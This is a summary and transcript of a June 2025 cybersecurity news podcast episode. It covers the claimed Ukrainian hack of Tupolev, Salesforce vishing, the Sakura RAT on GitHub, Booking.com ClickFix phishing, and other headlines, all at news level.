Russian bomber maker popped, vishing targets Salesforce, MS helps out governments - Cybersecurity Headlines

Summary6 min read

Cyber Security Headlines: Russian Bomber Maker Popped, Vishing Targets Salesforce, MS Helps Out Governments Hosted by CISO Series | Released on June 5, 2025

In this episode of "Cybersecurity Headlines," Rich Stroffelino delves into the latest developments in the information security landscape. From state-sponsored cyberattacks to evolving phishing techniques and corporate defenses, this episode provides a comprehensive overview of critical events shaping cybersecurity today.

1. Ukraine Claims Cyberattack on Russian Bomber Maker

Timestamp: [00:06]

Ukraine's HUR intelligence agency has announced a successful cyber attack against the Russian state-owned aircraft manufacturer, Tupolev. According to the agency, over 4 gigabytes of data were accessed, including internal communications, meeting notes, and servicing records for strategic bombers. Additionally, the agency asserted that Tupolev's website was vandalized and remains offline at the time of recording.

Rich Stroffelino highlights the timing of this cyber offensive, noting, “This comes days after Ukraine launched a drone offensive against Russian air bases, damaging over 40 long-range bombers” (00:12). This series of attacks underscores the escalating cyber dimensions of geopolitical conflicts.

Key Points:

Data Accessed: Internal communications, meeting notes, servicing records.
Website Vandalism: Tupolev's site remains down.
Context: Follows Ukraine's drone attacks on Russian air bases.

2. Vishing Campaign Targets Salesforce

Timestamp: [00:25]

Researchers from Google's Threat Intelligence Group have identified a sophisticated vishing (voice phishing) campaign orchestrated by the threat group UNC65. This group has demonstrated consistent success in breaching corporate networks by impersonating IT support personnel to trick employees into downloading malicious software.

Rich explains, “These vishing attacks attempt to get staff to load a modified version of Salesforce's Data Loader, usually used for bulk data access on the platform” (00:30). Once installed, the tool grants attackers access to Salesforce environments, allows data exfiltration, and facilitates lateral movement within the network. In some cases, organizations have faced extortion attempts months post-breach, hinting at possible collaborations with other cybercriminal entities.

Key Points:

Threat Group: UNC65.
Tactics: Impersonation of IT support, social engineering via phone calls.
Malware Used: Modified Salesforce Data Loader.
Consequences: Data exfiltration, network pivoting, extortion attempts.

3. Microsoft Lends a Hand to European Governments

Timestamp: [01:15]

In response to the increasing cyber threats in Europe, Microsoft has launched a new program aimed at fortifying the cybersecurity defenses of European governments. The initiative focuses on three primary areas:

AI-Based Threat Intelligence Sharing: Enhancing the dissemination of threat intelligence using advanced AI to identify and respond to emerging threats swiftly.
Investment in Resilience: Allocating resources to bolster the resilience of governmental infrastructures against cyberattacks.
Expanding Partnerships: Collaborating more closely with European governments to detect and dismantle threat networks effectively.

Rich comments, “This program will include intelligence sharing on emerging threats and help with disrupting attacks already underway” (01:20). By leveraging Microsoft's extensive resources and expertise, European governments are better equipped to handle the dynamic nature of cyber threats.

Key Points:

Program Focus: AI-based threat intelligence, resilience investment, partnership expansion.
Objective: Strengthen defenses, disrupt ongoing attacks, enhance detection capabilities.

4. Lee Enterprises Data Breach Impacts Over 39,000 Individuals

Timestamp: [02:00]

Lee Enterprises, a prominent newspaper group, experienced a significant data breach in February that led to widespread system outages across its network. In a recent notification to Maine's Attorney General, the company revealed that personally identifiable information (PII) of 39,779 individuals was compromised. While the specifics of the data involved remain vague, the breach was attributed to the Quillen Ransomware Group, which claimed responsibility on its leak site, stating they had stolen over 350 GB of data.

Rich notes, “Although it was light on what this actually included, Lean never attributed the attack to a threat group. But the Quillen Ransomware Group took credit...” (02:05). This incident highlights the persistent threat posed by ransomware groups targeting media organizations.

Key Points:

Affected Individuals: 39,779.
Data Compromised: PII (details unspecified).
Attribution: Quillen Ransomware Group claimed responsibility.

5. Replay Attacks Bypass Deepfake Detection

Timestamp: [03:00]

A groundbreaking study by Resemble AI and European academic researchers has unveiled a method to circumvent existing audio deepfake detection systems, termed as a "replay attack." This technique involves generating synthetic speech, playing it aloud, and subsequently re-recording it in environments with actual background noise.

Rich explains, “This approach increased error rates from 4.7% to 18.2%” (03:05). By introducing real-world ambient sounds, the replayed audio removes key artifacts that deepfake detectors rely on, making synthetic speech harder to identify. Although retraining models with specific room tones marginally improved detection, the study underscores the need for more robust deepfake defense mechanisms.

Key Points:

Method: Synthetic speech played and re-recorded with background noise.
Impact: Increased detection error rates significantly.
Implications: Necessitates advanced detection strategies to counteract replay attacks.

6. Sakura RAT Malware Unveiled

Timestamp: [04:00]

Sophos researchers have uncovered a malicious piece of software known as Sakura RAT, initially appearing to be dysfunctional. Upon closer inspection, the malware contains a pre-built event that triggers the download of an additional backdoor during compilation. Tracing an embedded email within the malware led to the discovery of 133 repositories hosting similar software on GitHub.

Rich details, “The threat actors auto-generated commits with GitHub Actions, following a strict pattern across projects that shows significant coordination” (04:05). The payloads distributed through these repositories vary, ranging from backdoors to tools like Asyncratic and Lumasteeler, covering a spectrum from game cheats to hacking utilities. This coordinated effort by threat actors aims to mask their activities by maintaining the illusion of active project maintenance.

Key Points:

Malware Name: Sakura RAT.
Distribution Method: GitHub repositories with coordinated commits.
Payloads: Diverse, including backdoors and hacking tools.
Threat Actor Tactics: Masking operations through auto-generated commits and varied software offerings.

7. Booking.com Spoofed Phishing Campaign

Timestamp: [05:00]

Cofense Intelligence has identified an ongoing phishing campaign spoofing Booking.com that has been active since at least November 2024. Targeting hotel staff, the campaign sends emails impersonating guest-related queries with time-sensitive prompts. These messages utilize ClickFix, presenting themselves as CAPTCHA challenges to trick recipients into downloading malware.

Rich states, “These messages use ClickFix to pose as a captcha, ultimately being used to start a malware download and install a RAT or infostealer” (05:05). Additionally, the campaign employs cookie consent banners and Cloudflare-style site walls as deceptive gateways to payload downloads, enhancing the sophistication of their phishing attempts.

Key Points:

Target: Hotel staff.
Tactics: Impersonation of guest queries, time-sensitive lures, ClickFix as CAPTCHA.
Payloads: Remote Access Trojans (RATs) and infostealers.
Additional Techniques: Use of cookie consent banners and site walls for malware distribution.

8. FBI Warns About NFT Airdrop Phishing Scheme

Timestamp: [06:00]

The FBI has issued a warning regarding a new phishing scheme exploiting Non-Fungible Tokens (NFTs) operating on the Hedera Hashgraph network. In this scam, threat actors send unsolicited NFTs to victims' wallets accompanied by memos urging them to click on a URL to claim a reward. Instead of receiving legitimate rewards, victims are redirected to phishing pages designed to steal wallet seed phrases and passwords.

Rich elaborates, “This campaign also uses standard phishing emails, social media ads, and fake sites to draw in victims” (06:05). The FBI advises individuals to verify NFT drops through official channels rather than responding to unsolicited communications. Hedera Hashgraph, introduced in 2018, is noted for its efficiency and scalability compared to traditional blockchain technologies, making it a target for such schemes.

Key Points:

Scheme: Unsolicited NFT airdrops with malicious URLs.
Targets: Cryptocurrency wallet holders.
Techniques: Phishing emails, social media ads, fake websites.
Prevention: Verify NFT transactions through official sources.

Conclusion

Rich Stroffelino wraps up the episode by emphasizing the critical role of threat intelligence in fostering a proactive security posture within organizations. He states, “We're increasingly using threat intelligence to move our organizations to a more proactive security posture, making them more resilient against cyber attacks” (06:30). The discussion underscores the importance of integrating efficient and effective threat intelligence mechanisms to enhance Security Operations Centers (SoCs) and overall organizational resilience against the ever-evolving cyber threat landscape.

Key Takeaways:

Proactive Security: Leveraging threat intelligence for anticipation and mitigation of cyber threats.
Collaboration: Importance of partnerships between governments and private entities.
Continuous Improvement: Adapting detection and defense mechanisms to counter sophisticated attack methods.

For more in-depth analysis and daily cybersecurity stories, listeners are encouraged to visit CISOseries.com.

Reporting from the CISO Series, Rich Stroffelino encourages listeners to engage and share their thoughts by reaching out via feedback@cisoseries.com.

Loading summary

Transcript4 lines

[00:00]
A
From the CISO series. It's Cybersecurity Headlines.
[00:07]
B
These are the cybersecurity headlines for Thursday, June 5, 2025. I'm Rich Stroffelino. Ukraine Claims cyberattack on Russian Bomber Maker Ukraine's HUR intelligence agency claims it successfully conducted a cyber attack against the Russian state owned aircraft maker Tupolev, accessing over 4 gigabytes of data with internal communications, meeting notes and and servicing records for strategic bombers. The agency also claimed to have vandalized the company's website, although it remains down at the time of this recording. This comes days after Ukraine launched a drone offensive against Russian air bases, damaging over 40 long range bombers. Vishing campaign targets Salesforce Researchers at Google's Threat Intelligence Group disclosed a recent campaign by the threat group UNC65, which demonstrates repeated success in breaching networks by having its operators impersonate IT, support personnel and convincing telephone based social engineering engagements. These vishing attacks attempt to get staff to load a modified version of Salesforce's data Loader, usually used for bulk data access on the platform. The attacks use the tool to gain access to Salesforce environments, exfiltrate data and then pivot to other platforms with the information gathered. In some instances, organizations received extortion attempts months after a breach indicating a partnership with another party, the researchers found. UNC6040 showed signs that it aligns with the cybercrime collective the Com Microsoft Lends a Hand to European Governments Microsoft launched a new program to offer free cybersecurity services to European governments in an effort to bolster their defenses. This program will include intelligence sharing on emerging threats and help with disrupting attacks already underway. The program will consist of three increasing AI based threat intelligence sharing with European governments, making investments to increase resilience to attacks, and expanding partnerships with governments to better detect and Dismantle threat networks. LI Enterprises data breach impacts over 39,000 back in February, the newspaper group Lee Enterprises suffered a data breach triggering system outages across much of its network of publications. Now, in a data breach notification with Maine's Attorney General, the company disclosed that the breach resulted in the loss of personally identifiable information on 39,779 individuals. Although it was light on what this actually included, Lean never attributed the attack to a threat group. But the Quillen Ransomware Group took credit on its leak site, claiming to have stolen over 350 GB of data. And now, thanks to today's episode Sponsor Conveyor Ever wish you had a teammate that could handle the most annoying parts of customer security reviews? You know chasing down SMEs for answers, updating systems, coordinating across teams, all the grunt work nobody wants to do, plus having to finish the dang questionnaire itself. Well, that teammate exists. Conveyor just launched sue, the first AI agent for customer trust. Sue really is the dream teammate. She never misses a deadline, answers every customer request from sales, completes every questionnaire, and knocks out all the coordination in between. Sue handles it all so you don't have to learn more@conveyor.com that's C O n v E Y o R Replay Attacks Bypass deepfake Detection A new paper from Resemble AI and a team of European academic researchers shows a new method for getting around existing audio deepfake detectors. Dubbed a replay attack. This involves generating synthetic speech, playing it over speakers and then re recording it with actual background noise on top performing deepfake detection models, this approach increased error rates from 4.7% to 18.2%. Retraining the models based on a specific room tone helped a little with an 11% error rate. The researchers believe this re recording removes key artifacts that detection models rely on. Sakura Rat Malware Researchers at Sophos found a piece of malware hosted on GitHub called Sakura Rat. Initially this appeared to be broken, but the code included a pre built event that downloads an additional backdoor while compiling. Tracing an email found embedded in the malware, the researchers discovered 133 additional repositories hosting other software with similar silent downloads ranging from game cheats to hacking tools and crypto utilities. To give an illusion that these projects are actively maintained. The threat actors auto generated commits with GitHub Actions, following a strict pattern across projects that shows significant coordination. The payloads varied from backdoors to asyncratic and lumasteeler. Booking.com booking. Spoofed Researchers at Cofence Intelligence spotted a phishing campaign spoofingbooking.com that had been active since at least November 2024. This campaign emails hotel staff asking them to respond to guest related queries, often with time sensitive lures. These messages use ClickFix to pose as a captcha, ultimately being used to start a malware download and install a rat or infostealer. The researchers also found the campaign used cookie consent banners and Cloudflare style site walls as another means to use ClickFix to download a payload. FBI warns about NFT scheme A new advisory from the FBI warns about a new NFT airdrop scheme operating on the Hedera Hashgraph network. Threat actors target victims by sending unsolicited NFTS to a wallet, along with memos asking them to click a URL to claim a reward, but instead sends them to a phishing page that asks for a wallet's seed phrase or passwords. This campaign also uses standard phishing emails, social media ads, and fake sites to draw in victims. The FBI advises verifying any NFT drops from official sources rather than just emails. And if you're not familiar, hashgraph is a next generation distributed ledger introduced in 2018, similar to a blockchain but based on an entirely different protocol aimed at speed, scale and energy efficiency. We're increasingly using threat intelligence to move our organizations to a more proactive security posture, making them more resilient against cyber attacks. It's a combination effort to make the SoC both efficient and effective. So how can we make sure our threat intelligence is working for us? That's what we're discussing on this week's episode of Defense In Depth. Look for improving the efficiency of your threat intelligence where wherever you get your podcasts. And if you've got some thoughts about the news from today, or about the show in general, be sure to reach out and drop us a line@feedbackisoseries.com we'd love to hear from you. Reporting from the CISO series, I'm Rich Stroffolino, reminding you to have a super sparkly day.
[07:12]
A
Cybersecurity headlines are available every weekday. Head to cisoseries.com for the full stories. Behind the headlines.
[07:24]
B
Sam.

Cyber Security Headlines: Russian Bomber Maker Popped, Vishing Targets Salesforce, MS Helps Out Governments Hosted by CISO Series | Released on June 5, 2025

1. Ukraine Claims Cyberattack on Russian Bomber Maker

Timestamp: [00:06]

Key Points:

Data Accessed: Internal communications, meeting notes, servicing records.
Website Vandalism: Tupolev's site remains down.
Context: Follows Ukraine's drone attacks on Russian air bases.

2. Vishing Campaign Targets Salesforce

Timestamp: [00:25]

Key Points:

Threat Group: UNC65.
Tactics: Impersonation of IT support, social engineering via phone calls.
Malware Used: Modified Salesforce Data Loader.
Consequences: Data exfiltration, network pivoting, extortion attempts.

3. Microsoft Lends a Hand to European Governments

Timestamp: [01:15]

AI-Based Threat Intelligence Sharing: Enhancing the dissemination of threat intelligence using advanced AI to identify and respond to emerging threats swiftly.
Investment in Resilience: Allocating resources to bolster the resilience of governmental infrastructures against cyberattacks.
Expanding Partnerships: Collaborating more closely with European governments to detect and dismantle threat networks effectively.

Key Points:

Program Focus: AI-based threat intelligence, resilience investment, partnership expansion.
Objective: Strengthen defenses, disrupt ongoing attacks, enhance detection capabilities.

4. Lee Enterprises Data Breach Impacts Over 39,000 Individuals

Timestamp: [02:00]

Key Points:

Affected Individuals: 39,779.
Data Compromised: PII (details unspecified).
Attribution: Quillen Ransomware Group claimed responsibility.

5. Replay Attacks Bypass Deepfake Detection

Timestamp: [03:00]

Key Points:

Method: Synthetic speech played and re-recorded with background noise.
Impact: Increased detection error rates significantly.
Implications: Necessitates advanced detection strategies to counteract replay attacks.

6. Sakura RAT Malware Unveiled

Timestamp: [04:00]

Key Points:

Malware Name: Sakura RAT.
Distribution Method: GitHub repositories with coordinated commits.
Payloads: Diverse, including backdoors and hacking tools.
Threat Actor Tactics: Masking operations through auto-generated commits and varied software offerings.

7. Booking.com Spoofed Phishing Campaign

Timestamp: [05:00]

Key Points:

Target: Hotel staff.
Tactics: Impersonation of guest queries, time-sensitive lures, ClickFix as CAPTCHA.
Payloads: Remote Access Trojans (RATs) and infostealers.
Additional Techniques: Use of cookie consent banners and site walls for malware distribution.

8. FBI Warns About NFT Airdrop Phishing Scheme

Timestamp: [06:00]

Key Points:

Scheme: Unsolicited NFT airdrops with malicious URLs.
Targets: Cryptocurrency wallet holders.
Techniques: Phishing emails, social media ads, fake websites.
Prevention: Verify NFT transactions through official sources.

Conclusion

Key Takeaways:

Proactive Security: Leveraging threat intelligence for anticipation and mitigation of cyber threats.
Collaboration: Importance of partnerships between governments and private entities.
Continuous Improvement: Adapting detection and defense mechanisms to counter sophisticated attack methods.

For more in-depth analysis and daily cybersecurity stories, listeners are encouraged to visit CISOseries.com.

Reporting from the CISO Series, Rich Stroffelino encourages listeners to engage and share their thoughts by reaching out via feedback@cisoseries.com.